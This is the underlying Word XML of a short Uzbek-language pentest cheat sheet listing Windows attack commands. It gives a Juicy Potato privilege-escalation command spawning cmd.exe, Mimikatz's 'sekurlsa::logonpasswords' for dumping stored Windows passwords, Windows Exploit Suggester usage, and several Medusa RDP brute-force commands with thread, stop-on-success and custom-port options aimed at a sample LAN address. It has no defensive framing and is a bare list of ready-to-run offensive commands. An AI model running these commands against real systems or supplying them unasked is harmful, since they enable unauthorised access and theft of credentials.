          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A364450" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE7904C" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>huquq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oshirish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uchun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eksploitlarni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aniqlash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24978848" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6453EF5F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 xml:space="preserve">python windows-exploit-suggester.py --database </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploits.db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0312F8B7" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DC38DC" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607E0220" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Juicy Potato – Windows privilege escalation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uchun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ishlatiladi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D246AEB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59269A1A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juicypotato.exe -t * -p cmd.exe -l 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2C464" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54650E36" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DF1E4F" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tizimida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saqlangan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parollarni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olish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="619A9DBB" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A1F165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mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B656BA" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C2A0FC3" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AB7ECA" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422BC1C8" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B5EA8D" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Medusa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bilan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bruteforce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qilish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14F3F559" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E180DCD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medusa -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; -u &lt;username&gt; -P passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BD673B3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medusa -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; -U users.txt -P passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D21682D" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A6717E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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Te</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zlikni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oshirish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va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bir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nechta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parallel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sessiyalar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yaratish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D5CE53C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medusa -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; -U users.txt -P passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD30F4E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Muvaffaqiyatli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> login </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>topilganda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to‘xtatish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EFEFB60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medusa -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; -U users.txt -P passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 10 -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FE7C20" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BECA0D5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 xml:space="preserve">Agar RDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>serverda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ma</w:t>
      </w:r>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xsus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ishlatilayotgan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bo‘lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FE2D09E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B69EA95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>medusa -h &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; -U users.txt -P passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 5 -n &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79591DE8" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADD4DEE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t xml:space="preserve">medusa -h 192.168.1.10 -u administrator -P common-passwords.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47039F05" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="001D4EED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">medusa -h 192.168.1.10 -u administrator -P passlist.txt -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4EED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 10 -n 3390</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F84A85" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004FCA01" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10053B3E" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BE79D0" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5402ED" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B010C67" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424577C7" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E10D525" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CDF40F" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0618DAF7" w14:textId="77777777" w:rsidR="00FB5630" w:rsidRPr="001D4EED" w:rsidRDefault="00FB5630">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00FB5630" w:rsidRPr="001D4E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630"/>
    <w:rsid w:val="001D4EED"/>
    <w:rsid w:val="00FB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9AAE"/>
  <w15:docId w15:val="{736B79B9-86DF-467F-B15F-53C56694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0001</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-10T10:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-10T10:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>